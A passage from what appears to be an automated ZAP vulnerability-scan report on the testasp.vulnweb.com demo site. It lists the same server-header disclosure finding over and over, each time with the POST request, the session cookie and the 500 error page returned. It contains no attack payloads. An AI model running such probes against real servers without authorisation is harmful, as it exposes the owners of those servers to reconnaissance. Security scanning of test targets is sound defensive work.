Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
